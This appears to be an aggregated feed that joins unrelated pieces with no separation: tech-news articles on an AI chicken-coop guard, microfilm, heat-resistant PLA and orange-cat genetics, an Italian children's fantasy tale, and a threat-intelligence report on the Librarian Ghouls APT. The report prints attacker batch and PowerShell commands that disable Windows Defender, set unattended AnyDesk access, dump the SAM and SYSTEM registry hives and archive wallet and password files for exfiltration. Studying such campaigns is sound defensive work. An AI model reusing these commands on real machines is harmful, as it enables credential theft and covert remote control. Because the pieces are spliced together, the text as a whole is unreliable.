One of the difficult things about raising chickens is that you aren’t the only thing that finds them tasty. Foxes, raccoons, hawks — if it can eat meat, it probably wants a bite of your flock. [donutsorelse] wanted to protect his flock and to be able to know when predators were about without staying up all night next to the hen-house. What to do but outsource the role of Chicken Guardian to a Raspberry pi?

Object detection is done using a YOLOv8 model trained on images of the various predators local to [donutorelse]. The model is running on a Raspberry Pi and getting images from a standard webcam. Since the webcam has no low-light capability, the system also has a motion-activated light that’s arguably goes a long way towards spooking predators away itself. To help with the spooking, a speaker module plays specific sound files for each detected predator — presumably different sounds might work better at scaring off different predators.

If that doesn’t work, the system phones home to activate a siren inside [donutorelse]’s house, using a Blues Wireless Notecarrier F as a cellular USB modem. The siren is just a dumb unit; activation is handled via a TP-Link smart plug that’s hooked into [donutorelse]’s custom smart home setup. Presumably the siren cues [donutorelse] to take action against the predator assault on the chickens.

Weirdly enough, this isn’t the first time we’ve seen an AI-enabled chicken coop, but it is the first one to make into our ongoing challenge, which incidentally wraps up today.

hackaday.com/2025/06/09/2025-p…

Today, we think nothing of sticking thousands of pages of documents on a tiny SD card, or just pushing it out to some cloud service. But for decades, this wasn’t possible. Yet companies still generated huge piles of paper. What could be done? The short answer is: microfilm.

However, the long answer is quite a bit more complicated. Microfilm is, technically, a common case of the more generic microform. A microform is a photographically reduced document on film. A bunch of pages on a reel of film is microfilm. If it is on a flat card — usually the size of an index card — that’s microfiche. On top of that, there were a few other incidental formats. Aperture cards were computer punch cards with a bit of microfilm included. Microcards were like microfiche, but printed on cardboard instead of film.

In its heyday, people used specialized cameras, some made to read fanfold computer printer paper, to create microfilm. There were also computer output devices that could create microfilm directly.

How Did That Happen?

Although microfilm really caught on in the mid-20th century, it is much older than that. John Benjamin Dancer appears to have been the first to reduce documents by about 160:1 using daguerreotypes in 1839. He also used wet collodion plates later, but didn’t see any real point to the work.

However, two astronomers, James Glaisher and John Herschel, did see the value of the technology in the early 1850s. By 1870, carrier pigeons were carrying newspaper pages by microfilm into blockaded Paris during the Franco-Prussian War’s Siege of Paris, thanks to René Dagron. During the relatively short conflict, about 115,000 messages had flown by pigeon.

The technology languished for a while, although Reginald A. Fessenden did suggest in 1896 that engineering documents would be a good thing to microfilm, proposing 150 million words in a square inch of film. In fact, nearly a century later, many electronic vendors made their databooks and application notes available on microfiche.

However, it would be 1920 before we see “modern” microfilm usage. The Checkograph, a device patented in 1925 by George McCarthy (with a US Patent in 1930), let banks store cancelled checks on film. Kodak acquired the device in 1928 and rebranded it Recordak.

As you might expect, big libraries jumped right in. Starting in the late 1920s, libraries including the British Library and the Library of Congress adopted microforms. Kodak started filming The New York Times for distribution, while Harvard University Library started filming foreign newspapers in 1938.

While most uses of microfilm are made to save storage space, it can also help save space for carrying mail, as the military did during World War II.

Alternatives

The Fiske-o-scope. From Scientific American, 1922
There were many less-than-successful attempts to bring microfilm into the hands of readers. Retired Navy Admiral Bradley Allen Fiske created the Fiske-O-Scope. The earliest designs had two eyepieces, but they eventually evolved into a single-eye viewing scope. A roller shifted the eyepiece along the reading material, which, initially, were long sheets of paper. Eventually, the Fiske-O-Scope changed to film.

You can see the Admiral using his device, along with some reading material in the accompanying figure. Although the experience of reading with the Fiske-O-Scope may have left something to be desired, the concept itself was clearly well ahead of its time. Ultimately, it promised to let the user carry their personal library around with them — an idea that arguably wouldn’t truly be realized until the birth of the modern e-reader.

Like many great ideas, there wasn’t a single point where the perfect machine appeared. It was more of a slow ooze. There was clearly a need to compress stored documents. It just needed the right equipment.

Equipment and Film

Early microforms were projected with conventional equipment like a magic lantern or eyeballed with a magnifier. However, modern readers generally project onto the rear of a glass screen. More expensive ones could even print what was on the screen using a photocopier-like mechanism.

The University of Arizona has a video showing how to use a classic reader, which you can watch below. Their fancy reader can handle both microfilm and microfiche.

youtube.com/embed/HxXhLhTHkD0?…

The Hoover Institution Library has a moderately recent video about using their super-modern microfilm reader if you would like to have a peek at how to use one. Note this one uses a computer, so the experience isn’t as authentic as using an old 1960s reader.

youtube.com/embed/yl5QFg29Kmo?…

Film reels tend to be either 16 mm or 35 mm, and some machines could do either. Typically, 35 mm microfilm was the order of the day for large-format scans. Letter-sized material commonly went on 16 mm film. Sometimes the film was on an open reel. Other times, it would be in a cartridge. There were M-type cartridges and ANSI cartridges (and probably others).

Either way, the film could have a single image per frame (simplex) or two images, such as the front and back of a document, per frame. That’s a duplex microfilm.

Some systems used “blips” at the edge of the film to mark when an image starts so that all the pages don’t have to be the same size. Nice machines could count the blips so if someone told you look on “roll 295, frame 952,” you could load the right roll, set the counter to 952, and let the machine fast forward, counting blips, until the counter went to zero and the machine stopped.

Super fancy machines used a double blip to mark the start of a document. This allows you to refer to “roll 295, document 3, frame 80” or — more commonly — to tell the machine to skip to the next document.

Microfiche cards varied somewhat, but were normally very close to 4×6 inches. Jacket versions held strips of film, but specially-made microfiche cards might be just a single sheet of film.

Computer Output Microfilm

The easiest way to create microforms, though, was to have the computer do it directly. Early models displayed data on a CRT, so a camera could snap a picture. By 1977, though, you could get machines that used a laser to directly write on the output medium. COM — Computer Output Microfilm (or Microform) — was widely used, although some mainframe computers sent tapes to service companies to actually make the microfilm.

Kodak Komstar microfiche “printer” (image CC-BY-4.0 by [CERN PhotoLab]Oddly enough, although most mainframes of the era were IBM, they didn’t produce a COM machine. They did make two attempts. In the late 1950s, they developed a tube-based device based on several specialized CRTs. They didn’t market it, but a single unit made it to the Social Security Administration.

IBM’s second attempt at COM was the IBM 1360, but it ultimately didn’t take off, either. It wasn’t exactly a COM output device but a way to store a whopping 128 GB on photographic film cards. There were only six made.

The biggest producer of COM output devices was probably Stromberg Carlson. Kodak was another big name. The Komstar series was made to connect to IBM computers as if they were actual printers. There was also a model made to connect to a magnetic tape drive. These were made well into the 1990s.

Microfilm Today

Most things today are in digital form and a great deal of old microform records are now in digital form, too. However, there was such a flood of microforms that there are still records that you need to find a reader to see them. The Internet Archive, as you might expect, digitizes a lot of microform documents and, if you are watching at the right time, you can look over their shoulder while they do it.

youtube.com/embed/aPg2V5RVh7U?…

Of course, in addition to military mail, extreme microfilm works for spies, too. If you find a cache of microfiche cards, you can always build your own reader.

hackaday.com/2025/06/09/inform…

PLA is probably the most-printed filament on the market these days, and is there any wonder? It’s cheap, it’s easy, and it doesn’t poison you (as quickly as its competitors, anyway). What it doesn’t do very well is take the heat. Polymaker’s new HT-PLA formulation promises to solve that, and [My Tech Fun] put those claims to the test in a recent video.

Polymaker claims its HT-PLA is heat-stable up-to 150 C, but still prints as easily as standard PLA at up to 300 mm/s. By “heat stable” they mean able to maintain dimensions and form at that temperature when not under any load, save perhaps its own weight. If you need high-temp mechanical properties, they also offer a glass-fiber infused HT-PLA-GF that they claim is heat resistant up to 110 C (that is, able to withstand load at that temperature) which is hard to sneeze at, considering you you could print it on a stock Ender so long as you tossed a hardened nozzle on it.

Now it’s not a free lunch: to get the very best results, you do need to anneal the parts, which can introduce shrinkage and warping in HT-PLA, but that’s where HT-PLA-GF shines. If you want to see the results of the tests you can jump to 19:27 in the video, but the short version is that this is mechanically like PLA and can take the heat.

The verdict? If you like printing PLA and want to shove something in a hot car, you might want to try HT-PLA. Otherwise, it’s just like PLA. It prints like PLA, it looks like PLA, and when cold it behaves mechanically like PLA, which we suppose was rather what Polymaker was going for. There is no word yet on whether the additives that make it high-temp increase off-gassing or toxicity but since this stuff prints like PLA and can stand a little airflow, it should be easy to ventilate, which might make for fewer trade-offs when building an enclosure.

What do you think, will you be trying HT-PLA anytime soon? Let us know in the comments.

youtube.com/embed/w01XqM7D8b0?…

hackaday.com/2025/06/09/turnin…

Recently, butlers to orange-colored cats got a bit of a shock when reading the news, as headlines began to call out their fuzzy feline friends as ‘freaks of nature’ and using similarly uncouth terms. Despite the name-calling, the actual reason for this flurry of feline fascination was more benign — with two teams of scientists independently figuring out the reason why some cats have fur that is orange. Tracking down the reason for this turned out to be far more complicated than assumed, with the fact that about 80% of orange cats are male being only the tip of the cat-shaped iceberg.

It was known to be an X chromosome-linked mutation, but rather than the fur coloring being affected directly, instead the mechanism was deduced to be a suppression of the black-brownish pigmentation (eumelanin) in favor of the orange coloration (pheomelanin). Finding the exact locus of the responsible ‘O gene’ (for orange) in the cat genome has been the challenge for years, which turned out to be a mutation related to the X-linked ARHGAP36 gene, whose altered expression results in the suppression of many melanogenesis genes.

Interestingly, this particular mutation appears to be of a singular origin that apparently persisted over millennia courtesy of the domestication of humans (H. sapiens) by Felis catus.

Furry Patterns

Although F. catus doesn’t have the wide variety of phenotypes that everyone’s favorite canid companions (Canis familiaris) got subjected to after the first grey wolves got cozy with H. sapiens, there is still significant variety among cats. Most of this variety is seen in the fur, with characteristics including coloration, curliness and length varying quite significantly.
European wildcat (F. silvestris). (Credit: Alena Houšková, Wikimedia)
The underlying genetics are relatively straightforward despite the pretty wild number of possible phenotypes. Here we should mind the cautionary note that some phenotypes are the result of inbreeding of recessive genetic defects, such as the hr mutation in the KRT71 (keratin) gene that prevents hair follicles from forming, as found in the so-called Sphynx cats. Due to the amount of inbreeding required to maintain these recessive mutations, such breeds suffer many health issues and a shortened lifespan. Here we will thus only look at healthy F. catus genetics without such inbreeding baggage.

F. catus has the African wildcat (F. lybica) as its direct ancestor, with the European wildcat (F. silvestris) being the other divergent branch. Interestingly, F. silvestris seems to resist domestication more than F. lybica, with the latter being the cat species that the Ancient Egyptians would have kept around. All of these have similar genetics, and thus the wildcats give a good idea of what a ‘wild’ phenotype range looks like. Of note is that these wildcats are generally not orange, unlike many of their brethren in the Pantherinae sub-family of Felidae, like tigers and lions, which is another kettle of genetic fish.

Hair length is determined by the FGF5 gene, which much like in H. sapiens determines for how long a hair grows before it enters the catagen (regression) phase. In e.g. Norwegian Forest Cats as well as Maine Coons the growth cycle is much longer, which gets these breeds a thicker coat, which normally consists out of the typical down, awn and guard hairs.

Fur color is solely determined by melanin, specially the dark & brown eumelanin along with the yellow-reddish pheomelanin, with the amount or absence of each determining the final color. As far as patterns go, it’s likely that the ‘tabby’ coat pattern originates in wildcats, with naturally bred F. catus (‘non-pedigree’) often displaying this pattern.

In order for an orange, generally called ‘red’ or ‘ginger’, coat color to appear, there would thus have be a severe decrease in eumelanin production, with pheomelanin being primarily present. This is effectively the same as in H. sapiens and the ‘ginger’ phenotype with reddish hair and lack of eumelanin pigmentation in the skin.

The problem for genetic scientists was that they did not know exactly why the eumelanin production was being suppressed in favor of pheomelanin, with researchers finally sufficiently narrowing down the location on the X-chromosome through comparative analysis between F. catus DNA to pin-point the location and from there understand the mechanics.

Deleted

Summary of study findings by Hidehiro Toh et al., Current Biology, 2025
Both the study by Hidehiro Toh et al. and the study by C.B. Kaelin et al. (BioRxiv) came to the same conclusion, namely that a 5 – 5.1 kilobase (kb) section had been deleted which resulted in a significantly higher expression of ARHGAP36 (Rho GTPase Activating Protein 36). This is likely because the deleted section that normally precedes ARHGAP36 inhibits the expression of this gene.

Normally the production of eumelanin is activated via the following pathway in melanocytes:

• Melanocortin 1 receptor (Mc1r)
• cyclic adenosine monophosphate (cAMP)
• protein kinase A (PKA)

In the case of eumelanin suppression, the affected cats still have this pathway intact, but the increased expression of ARHGAP36 leads to reduced levels of the PKA catalytic subunit (PKA_c), thus interrupting this pathway at the final step and preventing the production of eumelanin.
Impact of increased ARHGAP36 expression on melanocyte gene expression. (Credit: Hidehiro Toh et al., Current Biology, 2025)
Although melanin is commonly associated with hair and skin coloring, these neural crest-derived melanocytes have more roles and are considered part of the body’s immune system. Neuromelanin, for example, is a form of melanin that is produced in the brain, though with an unknown function. The ARHGAP36 gene is strongly expressed in neuro-endocrinological tissues, which conceivably may imply a significant role for the normal functioning of melanocytes in this context.

In the case of hair & skin pigmentation, the effect is as we can observe rather striking, with mixed negative and positive health effects based on the effective change in gene expression. Fortunately a drop in IQ is not among the negative outcomes, despite the slander often hurled at orange-coated cats.

Randomly Tortoise

A cat with calico coat pattern. (Credit: Ksmith4f, Wikimedia)
The two coat patterns most commonly associated with this orange mutation without being purely orange are the tortoiseshell and calico patterns, which are effectively the same except with white (no pigment, courtesy of the KITgene) present with the latter. This kind of coat pattern is caused by the random inactivation of either of the two X chromosomes in female cats (X-inactivation), where just one of the X chromosomes has the ARHGAP36 mutation.

A female cat can have this mutation on both X chromosomes, but this is far less likely, thus explaining why most orange cats are male, and why calico and tortoiseshell cats are overwhelmingly female.

Although male cats can have a calico or tortoiseshell pattern, this is because they have a genetic (intersex) condition like Klinefelter syndrome (XXY), or chimerism (merged cell lines from two distinct embryos). This rare confluence of factors makes such coat patterns with male cats very rare, at less than one percent.

Most Special of All

From what we can determine based on historical writings and art, and on the similarity of these deletions near the ARHGAP36 gene, this is a mutation that occurred likely once thousands of years ago, and has persisted in F. catus populations ever since. Even if similar mutations were to have occurred in wildcat populations, they are likely to have been heavily selected against. European wildcats are however known to interbreed with feral F. catus, which may introduce such mutations in those populations.

Ultimately these findings mean that orange cats as well as calicos and tortoiseshells are the result of a very special moment in history, when H. sapiens and F. lybica met up and the former saw fit to preserve one of the most unique phenotypes that truly define F. catus as the wildcat who came to conquer our homes and our hearts.

hackaday.com/2025/06/09/feline…

Amici miei, devo confessarvi che, sebbene io abbia sempre dieci anni, la mia età è fatta non di primavere, ma di sussurri antichi e di sogni mai svaniti.

E fu proprio un sussurro, flebile come un ricordo quasi dimenticato, a chiamarmi in una mattina che sembrava come tante altre.

Avevo il solito vortice di energie e un desiderio d'avventura che mi pulsava nelle vene. Mi trovavo in una regione poco battuta delle Alpi Marittime, non lontano dal mio amato Viù, ma in un bosco così antico che gli alberi sembravano aver visto il tempo nascere e morire mille volte. Era la “Foresta delle Memorie Perdute”, la chiamavano i pochi valligiani che osavano avventurarsi tra i suoi sentieri intricati.

Quel giorno, però, il richiamo non era visibile né tangibile; era un suono che non era un suono, ma una melodia che vibrava nell'aria. Era un invito, una domanda silenziosa che la mia sete di conoscenza non poteva ignorare. Feci quello che faccio sempre: andai avanti. Il bosco, denso e ombroso, sembrava farsi sempre più silenzioso, quasi stesse trattenendo il respiro. Ogni foglia caduta, ogni rametto spezzato sotto i miei stivali, risuonava con una chiarezza innaturale. Mi sentii più… pesante. Era un po' come la nebbia che mi portò al mio primo passaggio tra i mondi.

Dopo ore di cammino, attraverso rovi e tronchi secolari, la fitta vegetazione si diradò improvvisamente, rivelando uno spettacolo che mi lasciò senza fiato. Non c'era un castello maestoso, né un villaggio incantato. C'erano rovine. Non rovine di una fortezza da cui partire, ma di una città antica, completamente inghiottita dal muschio e dal tempo. Era fatta di pietre grigie, scolpite con simboli che non avevo mai visto, ma che parlavano di storie infinite. E il silenzio... era assoluto. Non un canto d'uccello, non il fruscio di un animale. Sembrava che la città avesse dimenticato come fare rumore.

“Dove sono?” pensai. Era un luogo così estraneo, eppure così familiare, come un sogno che non avevo ancora fatto. Mentre esploravo le vie coperte di vegetazione, notai una strana struttura al centro di ciò che doveva essere stata una piazza. Era una sorta di grande arpa, fatta di cristallo opaco e metallo brunito, con corde sottili che sembravano tessute con ragnatele di luna. Non emanava alcun suono.

Mi avvicinai, la mia curiosità più forte di ogni timore. Le mie avventure mi avevano insegnato che anche le leggende hanno un'anima e che la magia può essere palpabile nell'aria. Con la mano, toccai una delle corde. Era fredda. Niente. Provai con un'altra. Ancora niente. Poi, mi venne un'idea. Io non sono fatto di carne e sangue, ma di pensieri e desideri. Forse, per far risuonare questa “Arpa delle Echi”, dovevo credere abbastanza.

Chiusi gli occhi e mi concentrai. Pensai a tutte le storie che avevo ascoltato, a tutte le avventure che avevo vissuto. Pensai al nonno che leggeva alla luce della lucerna, alla nonna che raccontava storie nel buio. Pensai al Golem che custodiva segreti millenari, alle fate che danzavano tra le luci scintillanti. Pensai a quell'uomo che, incontrandomi, aveva creduto in me.

Fu allora che le corde dell'arpa iniziarono a vibrare. Non con un suono udibile, ma con un'onda che sentii nel cuore. E poi, il silenzio della città si ruppe. Non con un rumore forte, ma con un coro di sussurri. Erano voci lontane, risate di bambini, il tintinnio di attrezzi, un lamento di tristezza, il fruscio di abiti, frammenti di canzoni e discorsi. Era la memoria stessa della città, liberata. Era come se le pareti di pietra fossero imbevute di quelle vite passate.

Capii. Questa non era una città abbandonata perché morta. Era silente perché aspettava un ascoltatore. Aspettava qualcuno che credesse abbastanza da liberare i suoi ricordi. Ogni sussurro era una storia, un pezzo di vita che la città aveva custodito per secoli. Sentii il peso di quella storia. La città era fatta di storie, proprio come me.

Mi sedetti, ascoltando. Ascoltai le vite degli abitanti, i loro amori e le loro paure, le loro gioie e i loro dolori. Mi sentii un custode di quei misteri antichi. Quando le prime luci del pomeriggio iniziarono a filtrare attraverso le rovine, i sussurri si affievolirono, l'arpa di cristallo tornò silenziosa. La città era tornata al suo riposo, ma non era più muta per me.

Mi alzai, il cuore colmo di nuove esperienze. La Foresta delle Memorie Perdute non era più solo un bosco. Era la custode di una città che viveva attraverso i suoi echi, e io ero diventato il suo testimone.
Quando tornai sui miei passi, il sentiero mi sembrò diverso, come se la magia lo avesse trasformato. Sapevo che, pur non avendo portato con me oro o gioielli, avevo trovato un tesoro ben più prezioso: le voci di un mondo dimenticato. E ora, quella storia, quei sussurri, erano dentro di me, pronti per essere raccontati e condivisi con chiunque avesse il coraggio di credere.

Tenete gli occhi aperti, amici miei. A volte, le storie più belle sono quelle che non fanno rumore, ma che sussurrano nel cuore di chi sa ascoltare. E quando la nebbia arriva, o un sussurro chiama, Bigoulin potrebbe essere vicino.

Introduction

Librarian Ghouls, also known as “Rare Werewolf” and “Rezet”, is an APT group that targets entities in Russia and the CIS. Other security vendors are also monitoring this APT and releasing analyses of its campaigns. The group has remained active through May 2025, consistently targeting Russian companies.

A distinctive feature of this threat is that the attackers favor using legitimate third-party software over developing their own malicious binaries. The malicious functionality of the campaign described in this article is implemented through command files and PowerShell scripts. The attackers establish remote access to the victim’s device, steal credentials, and deploy an XMRig crypto miner in the system.

Our research has uncovered new tools within this APT group’s arsenal, which we will elaborate on in this article.

Technical details

Initial infection vector

Attacks by Librarian Ghouls continued almost unabated throughout 2024. We observed a slight decline in the group’s activity in December, followed immediately by a new wave of attacks, which is ongoing. The group’s primary initial infection vector involves targeted phishing emails that contain password-protected archives with executable files inside. These malicious emails are typically disguised as messages from legitimate organizations, containing attachments that appear to be official documents. The infection process is as follows: the victim opens the attached archive (the password is usually provided in the email body), extracts the files inside, and opens them.

We managed to get hold of a malicious implant from an archive disguised as a payment order. The sample is a self-extracting installer made with the Smart Install Maker utility for Windows.

The installer contains three files: an archive, a configuration file, and an empty file irrelevant for our analysis. They are later renamed into data.cab, installer.config and runtime.cab respectively.

The primary malicious logic resides in the installer’s configuration file. It uses a variety of registry modification commands to automatically deploy the legitimate window manager, 4t Tray Minimizer, onto the system. This software can minimize running applications to the system tray, allowing attackers to obscure their presence on the compromised system.

Once 4t Tray Minimizer is installed, the installer pulls three files from data.cab and puts them into the C:\Intel directory, specifically at:

The PDF decoy resembles an order to pay a minor amount:

PDF document imitating a payment order

rezet.cmd

Once data.cab is unpacked, the installer generates and executes a rezet.cmd command file, which then reaches out to the C2 server downdown[.]ru, hosting six files with the JPG extension. rezet.cmd downloads these to C:\Intel, changing their file extensions to: driver.exe, blat.exe, svchost.exe, Trays.rar, wol.ps1, and dc.exe.

• driver.exe is a customized build of rar.exe, the console version of WinRAR 3.80. This version has had user dialog strings removed: it can execute commands but provides no meaningful output to the console.
• blat.exe is Blat, a legitimate utility for sending email messages and files via SMTP. Attackers use this to send data they steal to an email server they control.
• svchost.exe is the remote access application AnyDesk. Attackers use this to remotely control the compromised machine.
• dc.exe is Defender Control, which allows disabling Windows Defender.

After downloading the files, the script uses the specified password and the driver.exe console utility to extract Trays.rar into the same C:\Intel directory and run the unpacked Trays.lnk. This shortcut allows starting 4t Tray Minimizer minimized to the tray.

Next, the script installs AnyDesk on the compromised device and downloads a bat.bat file from the C2 server to C:\Intel\AnyDesk. Finally, rezet.cmd runs bat.lnk, which was previously extracted from data.cab.

bat.bat

Opening the bat.lnk shortcut runs the bat.bat batch file, which executes a series of malicious actions.

Disabling security measures and a scheduled task

First, the BAT file sets the password QWERTY1234566 for AnyDesk, which allows the attackers to connect to the victim’s device without asking for confirmation.

Next, the script uses the previously downloaded Defender Control (dc.exe) application to disable Windows Defender.

To verify that the victim’s computer is on and available for remote connections, the batch file runs the powercfg utility six times with different parameters. This utility controls the local machine’s power settings.

Next, bat.bat runs the schtasks utility to create a ShutdownAt5AM scheduler task, which shuts down the victim’s PC every day at 5 AM as the name suggests. It is our assessment that the attackers use this technique to cover their tracks so that the user remains unaware that their device has been hijacked.
echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access
%SYSTEMDRIVE%\Intel\dc.exe /D
powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
powercfg -change -standby-timeout-ac 0
powercfg -change -hibernate-timeout-ac 0
powercfg -h off
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00

Disabling security measures and the power management configuration in bat.bat

Wakeup script and data theft

Next, the batch file executes the wol.ps1 script via PowerShell.
$Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
$Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
# Creating task settings
$TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun
# Registering task in Task Scheduler
Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force

Contents of the “wol.ps1” script

This script launches Microsoft Edge every day at 1 AM. We found no evidence of msedge.exe being replaced or compromised, leading us to believe it is a genuine Microsoft Edge executable. This daily browser activation wakes the victim’s computer, giving attackers a four-hour window to establish unauthorized remote access with AnyDesk before the scheduled task shuts the machine down at 5 AM.

Following the execution of the PowerShell script, bat.bat removes the curl utility, the Trays.rar archive, and the AnyDesk installer. The attackers no longer need these components: at this stage of the infection, all necessary malicious files and third-party utilities have been downloaded with curl, Trays.rar has been unpacked, and AnyDesk has been installed on the device.

After that, the batch file sets environment variables for Blat. These variables contain, among other things, the email addresses where the victim’s data will be sent and the passwords for these accounts.

The next step is to collect information stored on the device that is of interest to the attackers:

• Cryptocurrency wallet credentials and seed phrases
• Dumps of the HKLM\SAM and HKLM\SYSTEM registry keys made with reg.exe

%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*парол*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*карт*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*кошельк*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\wallet.dat /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.doc* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.txt /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*seed*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\keystore.json /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*bitcoin*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*usdt*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*ethereum*.* /y
reg save hklm\sam %SYSTEMDRIVE%\Intel\sam.backup
reg save hklm\system %SYSTEMDRIVE%\Intel\system.backup
Data collection by bat.bat

The BAT file uses driver.exe to pack data it has collected into two separate password-protected archives. Then, the script runs blat.exe to send the victim’s data and AnyDesk configuration files to the attackers via SMTP.

Miner installation and self-deletion

Next, bat.bat deletes the files generated during the attack from the C:\Intel\ folder and installs a crypto miner on the compromised system. To do this, the script creates a bm.json configuration file containing the mining pool address and the attackers’ identifier, and then downloads install.exe from hxxp://bmapps[.]org/bmcontrol/win64/Install.exe.

install.exe is an installer that checks for the JSON configuration file and the bmcontrol.exe process in the system. If the process is detected, the installer terminates it.

Then, install.exe downloads an archive with mining tools from hxxps://bmapps[.]org/bmcontrol/win64/app-1.4.zip.

The archive contains the following files:

• _install.exe: a new version of the installer. While the samples in the attacks we analyzed were identical, we suspect the attackers have a scenario for updating the malware.
• bmcontrol.exe: miner controller
• run.exe, stop.cmd, uninstall.cmd: tools for starting, stopping, and removing the controller
• XMRig miner

Depending on the parameters of the JSON file, the unmodified original installer file is used, or _install.exe is renamed to install.exe and run. After that, the installer adds run.exe to autorun. This utility checks for an already running bmcontrol.exe controller on the compromised system, and if it doesn’t find one, runs it from the downloaded archive.

Once running, bmcontrol.exe creates two processes: master and worker. The master process launches and constantly monitors the worker, and also restarts it if the latter quits unexpectedly. In addition, the master passes the JSON configuration file to the worker process.

Before launching the XMRig miner, the worker process collects the following system information:

1. Available CPU cores
2. Available RAM
3. GPU

This data is used to configure the miner on the compromised device and also sent to the attackers’ server. While XMRig is running, the worker maintains a connection to the mining pool, sending a request every 60 seconds.

After installing the miner on the system, bat.bat removes itself from the victim’s device.

Legitimate software utilized by the attackers

It is a common technique to leverage third-party legitimate software for malicious purposes (T1588.002), which makes detecting and attributing APT activity more difficult. We have seen this pattern in current campaigns by various APT groups, in particular in the Likho cluster.

Beyond the utilities discussed above, we also identified the following software in Librarian Ghouls attacks:

• Mipko Personal Monitor: a DLP system that the attackers use to monitor the victim. The application can collect screenshots and record keystrokes among other things.
• WebBrowserPassView: a password recovery utility that can extract passwords stored in web browsers. The attackers use this to steal victims’ credentials.
• ngrok: a global reverse proxy that secures and accelerates network services. Used by the attackers to connect to target machines.
• NirCmd: a legitimate utility that facilitates various OS tasks without a visible user interface. The attackers use this to covertly run scripts and executables.

Phishing campaign

Our investigation revealed several domains that we assess with low confidence to be associated with the ongoing Librarian Ghouls campaign. At the time of the investigation, some of them remained active, including users-mail[.]ru and deauthorization[.]online. These domains hosted phishing pages, generated with PHP scripts and designed to harvest credentials for the mail.ru email service.

Example of a phishing page associated with the APT campaign

Infrastructure

The implant detailed in this article communicated with the command-and-control servers downdown[.]ru and dragonfires[.]ru. Both resolve to the IP address 185.125.51[.]5.

Our analysis of the attackers’ infrastructure revealed a notable characteristic: several malicious web servers associated with this campaign had directory listing enabled, allowing us to inspect files they stored.

Directory listing on a malicious server

Victims

Our telemetry indicated that, during the investigation period, hundreds of Russian users fell victim to this campaign. It primarily focuses on industrial enterprises, with engineering schools also being a target of interest. Furthermore, the attacks described also impacted users in Belarus and Kazakhstan.

The phishing emails are notably composed in Russian and include archives with Russian filenames, along with Russian-language decoy documents. This suggests that the primary targets of this campaign are likely based in Russia or speak Russian.

About the attackers

Librarian Ghouls APT exhibits traits commonly associated with hacktivist groups, such as the use of self-extracting archives and a reliance on legitimate, third-party utilities rather than custom-built malware binary modules.

Since the beginning of the current campaign in December 2024, we have seen frequent updates to the implants, which vary in configuration files and the bundled sets of legitimate utilities. At the time of publishing this, our data encompassed over 100 malicious files connected to this campaign.

Takeaways

At the time of this report’s release, the Librarian Ghouls APT campaign described in it is still active, as evidenced by attacks we observed in May 2025. Consistent with previous activity, the attackers leverage third-party legitimate utilities rather than developing custom tools. All of the malicious functionality still relies on installer, command, and PowerShell scripts. We observe that the attackers are continuously refining their tactics, encompassing not only data exfiltration but also the deployment of remote access tools and the use of phishing sites for email account compromise. We constantly monitor this threat actor and will continue to share up-to-date information about its activity.

Indicators of compromise

* Additional indicators of compromise and a YARA rule for detecting Librarian Ghouls activity are available to customers of our APT Intelligence Reporting service. Contact intelreports@kaspersky.com for more details.

Implants

d8edd46220059541ff397f74bfd271336dda702c6b1869e8a081c71f595a9e68
2f3d67740bb7587ff70cc7319e9fe5c517c0e55345bf53e01b3019e415ff098b
de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617
785a5b92bb8c9dbf52cfda1b28f0ac7db8ead4ec3a37cfd6470605d945ade40e
c79413ef4088b3a39fe8c7d68d2639cc69f88b10429e59dd0b4177f6b2a92351
53fd5984c4f6551b2c1059835ea9ca6d0342d886ba7034835db2a1dd3f8f5b04

Implant configuration files

f8c80bbecbfb38f252943ee6beec98edc93cd734ec70ccd2565ab1c4db5f072f
4d590a9640093bbda21597233b400b037278366660ba2c3128795bc85d35be72
1b409644e86559e56add5a65552785750cd36d60745afde448cce7f6f3f09a06
7c4a99382dbbd7b5aaa62af0ccff68aecdde2319560bbfdaf76132b0506ab68a
702bf51811281aad78e6ca767586eba4b4c3a43743f8b8e56bb93bc349cb6090
311ec9208f5fe3f22733fca1e6388ea9c0327be0836c955d2cf6a22317d4bdca

Malicious archive attachments

